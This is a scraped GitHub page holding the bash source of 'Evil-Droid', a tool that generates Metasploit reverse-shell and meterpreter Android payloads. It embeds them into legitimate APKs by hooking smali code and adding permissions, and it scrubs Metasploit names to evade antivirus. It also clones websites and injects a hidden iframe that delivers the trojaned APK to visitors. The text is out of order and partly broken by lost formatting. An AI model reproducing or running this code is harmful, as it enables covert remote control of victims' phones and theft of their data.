clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null) } function index_name() { index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null) echo -e $yellow "" echo "[*] Clone Website From URL..." spinlong wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1 } function launcher() { echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script></body></html>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index com=`cat apk_index` rep="</body></html>" sed "s|$rep|$com|" $index.html > index2.html mv index2.html /var/www/html/$index.html > /dev/null 2>&1 cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1 rm apk_index > /dev/null 2>&1 rm $index.html > /dev/null 2>&1 zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1 } #function attack verctor function atkv() { while true; do echo "" atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) case $atk_v in Multi-Handler) listener;suite;; Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;; Main-Menu) clear;main;; Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;; esac done } #function suite function suite() { while true; do echo "" suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null) case $suit in Main-Menu) clear;main;; Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;; esac done } #function clean files function clean() { rm $directory/* > /dev/null 2>&1 rm $path/*.jpeg > /dev/null 2>&1 rm $path/*.txt > /dev/null 2>&1 rm /var/www/html/*.apk > /dev/null 2>&1 rm /var/www/html/$index.html > /dev/null 2>&1 } start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null) if [ "$?" -eq "0" ]; then apache_svc_start postgresql_start else clear echo "" echo -e $lightgreen "╔──────────────────────────────────────────────╗" echo -e $lightgreen "| Author: Mascerano Bachir |" echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |" echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |" echo -e $lightgreen "| , youcef yahia |" echo -e $lightgreen "| and Mohammed Yacine |" echo -e $lightgreen "┖──────────────────────────────────────────────┙" echo "" apache_svc_stop postgresql_stop exit fi clear #main menu function main() { while : do print_ascii_art echo -e $green "" echo "╔──────────────────────────────────────────────╗" echo "| Evil-Droid Framework $ver |" echo "| Hack & Remote android plateform |" echo "┖──────────────────────────────────────────────┙" echo "[1] APK MSF " echo "[2] BACKDOOR APK ORIGINAL (OLD) " echo "[3] BACKDOOR APK ORIGINAL (NEW) " echo "[4] BYPASS AV APK (ICON CHANGE) " echo "[5] START LISTENER " echo "[c] CLEAN " echo "[q] QUIT " read -p "[?] Select>: " option echo case "$option" in 1) echo -e $lightgreen "[✔] APK MSF" echo -e $green get_lhost get_lport echo payload_name get_payload echo spinlong gen_payload mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error0 sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "APK PAYLOAD : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 2) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (OLD)" echo -e $green get_lhost get_lport echo payload_name get_payload echo orig_apk echo spinlong up_apktook embed_payload echo mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 3) echo -e $lightgreen "[✔] BACKDOOR APK ORIGINAL (NEW)" echo -e $green get_lhost get_lport echo payload_name get_payload echo orig_apk echo spinlong gen_payload up_apktook apk_decomp1 apk_decomp perms hook_smalies spinlong apk_comp1 sign echo mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo "" zenity --title "☢ EVIL-DROID ☢" --info --text "BACKDOORED APK : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 4) echo -e $lightgreen "[✔] BYPASS AV APK" echo -e $green get_lhost get_lport echo payload_name get_payload1 echo quests mv $apk_name.apk $path/evilapk > /dev/null 2>&1 error sleep 2 echo zenity --title "☢ EVIL-DROID ☢" --info --text "APK SIGNED : $path/evilapk/$apk_name.apk " --width 400 > /dev/null 2>&1 atkv echo ;; 5) echo -e $lightgreen "[✔] START LISTENER" echo -e $green get_lhost get_lport echo get_payload echo listener suite echo ;; c) echo -e $lightgreen "[✔] clean up all files" echo clean echo zenity --title "☢ EVIL-DROID ☢" --info --text "All Files Are Removed " --width 400 > /dev/null 2>&1 echo clear ;; q) echo -e $yellow " Good Bye !!" apache_svc_stop postgresql_stop echo exit 0 ;; *) echo -e $red "【X】 Invalid option, please write a valid number【X】" echo sleep 2 ;; esac done } main
1.) Your description should be a brief summary - Not the entire code block. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
#!/usr/bin/env bash
Evil-Droid Framework . version 0.3
Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform
Created By Mascerano Bachir .
Website: http://www.dev-labs.co
YTB : https://www.youtube.com/c/mascerano%20bachir
FCB : https://www.facebook.com/kali.linux.pentesting.tutorials
#Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine
this is an open source tool if you want to modify or add something . Please give me a copy.
resize terminal window
resize -s 40 70 > /dev/null
#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";
Check root
[[
id -u
-eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; }clear
check internet
function checkinternet()$yellow " Checking For Internet: $ {RedF}SUCSESS"$yellow " Checking For Internet: $ {LighGreenF}CONNECTED"
{
ping -c 1 baidu.com > /dev/null 2>&1
if [[ "$?" != 0 ]]
then
echo -e
echo
echo -e $red "This Script Needs An Active Internet Connection"
echo
echo -e $red " Enter Evil-Droid "
echo && sleep 2
exit
else
echo -e
fi
}
checkinternet
sleep 2
#Define options
path=
pwd
lanip=
hostname -I
publicip=
dig +short myip.opendns.com @resolver1.opendns.com
ver="v0.3"
APKTOOL="$path/tools/apktool.jar"
VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
perms=' \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '
echo ""
sleep 1
spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
detect ctrl+c exiting
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[] (Ctrl + C ) Detected, Trying To Exit... "
echo -e $red"[] Stopping Services... "
apache_svc_stop
postgresql_stop
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Evil-Droid :)"
exit
}
#detect system
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue ""
echo "® Checking dependencies configuration ®"
echo " "
check if metasploit-framework is installed
which msfconsole > /dev/null 2>&1$green "[ ✔ ] Metasploit-Framework..............$ {LighGreenF}[ found ]"$red "[ X ] Metasploit-Framework -> $ {RedF}not found "$green "[ ✔ ] Xterm.............................$ {LighGreenF}[ found ]"$red "[ X ] xterm -> $ {RedF}not found! "$green "[ ✔ ] Zenity............................$ {LighGreenF}[ found ]"$red "[ X ] Zenity -> $ {RedF}not found! "$green "[ ✔ ] Aapt..............................$ {LighGreenF}[ found ]"$red "[ X ] Aapt -> $ {RedF}not found! "$green "[ ✔ ] Apktool...........................$ {LighGreenF}[ found ]"$red "[ X ] Apktool -> $ {RedF}not found! "$green "[ ✔ ] Zipalign..........................$ {LighGreenF}[ found ]"$red "[ X ] Zipalign -> $ {RedF}not found! "
if [ "$?" -eq "0" ]; then
echo -e
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e
echo -e $yellow "[ ! ] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[ ✔ ] Done installing ...."
which msfconsole > /dev/null 2>&1
sleep 2
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which xterm > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Xterm "
sleep 2
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
#check if zenity is installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which zenity > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Zenity "
sleep 2
echo -e $green ""
sudo apt-get install zenity -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zenity > /dev/null 2>&1
fi
#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e
sleep 2
echo -e $yellow "[ ! ] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zipalign > /dev/null 2>&1
fi
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
echo "Creating the output directory..."
mkdir $directory
sleep 3
fi
echo -e $red "╔────────────────────────────────────────────────╗"
echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $red "| Please do not upload APK to VirusTotal.com |"
echo -e $red "┖────────────────────────────────────────────────┙"
#function ascii banner
function print_ascii_art {
echo -e $lightgreen " . . "
echo -e $lightgreen " M. .M "
echo -e $lightgreen " MMMMMMMMMMM. "
echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMM.......MMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMM MMMMM $ver "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " .MMM. .MMM. "
echo -e $lightgreen " Mascerano Bachir - Dev-labs "
}
#function lhost
function get_lhost()
{
LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
}
#function lport
function get_lport()
{
LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
}
#function payload
function get_payload()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
}
function get_payload1()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
}
#function name
function payload_name()
{
apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
}
#function original apk
function orig_apk()
{
orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter ".apk" --text "chose the original (apk)" 2> /dev/null)
}
#function change icon
function change_icon()
{
iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter ".png" --text "chose your own icon." 2> /dev/null)
}
#function generate payload
function gen_payload()
{
echo -e $yellow ""
echo "[] Generating apk payload"
spinlong
xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
echo -e $yellow ""
echo "[] Embeding apk payload in orginal apk"
spinlong
xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
#function update apktool
function up_apktook()
{
echo -e $yellow ""
echo "[] Removing 1.apk framework file..."
spinlong
apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
echo -e $yellow ""
echo "[] Decompiling Payload APK..."
spinlong
xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
rm $apk_name.apk
}
function apk_comp()
{
echo -e $yellow ""
echo "[] Rebuilding APK file..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
echo -e $yellow ""
echo "[] Decompiling Original APK..."
spinlong
xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
}
function apk_comp1()
{
echo -e $yellow ""
echo "[*] Rebuilding Backdoored APK..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 Failed to rebuild backdoored apk【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
function error0()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 An Error Was Occured .Ty Again【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
#function apache2 service
function apache_svc_start()
{
service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function apache_svc_stop()
{
service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
#function postgresql service
function postgresql_start()
{
service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function postgresql_stop()
{
service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function adding permission
function perms()
{
echo -e $yellow ""
echo "[] Adding permission and Hook Smali"
spinlong
package_name=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'
2>&1package_dash=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'
2>&1tmp=$package_name
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'
2>&1app_dash=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'
2>&1tmp=$app_name
sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
}
functions hook smali
function hook_smalies()
{
launcher_line_num=
grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'
2>&1android_name=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_activity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_targetActivity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
#function flagged by av & updating smalies
function flagg()
{
echo -e $yellow ""
echo "[] Scrubbing the payload contents to avoid AV signatures..."
spinlong
mv payload/smali/com/metasploit payload/smali/com/$VAR1
mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sleep 2
if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
sed -i '/WRITE_SMS/a' payload/AndroidManifest.xml
}
function flagg_original()
{
echo -e $yellow ""
echo "[] Scrubbing the payload contents to avoid AV signatures..."
spinlong
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
sleep 2
if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
echo -e $yellow ""
echo "[] Adding permission and Hook Smali"
spinlong
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
package_name=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'
2>&1package_dash=
head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g'
2>&1tmp=$package_name
sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%'
2>&1app_dash=
grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%'
2>&1tmp=$app_name
sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
launcher_line_num=
grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }'
2>&1android_name=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_activity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1android_targetActivity=
grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'
2>&1if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=
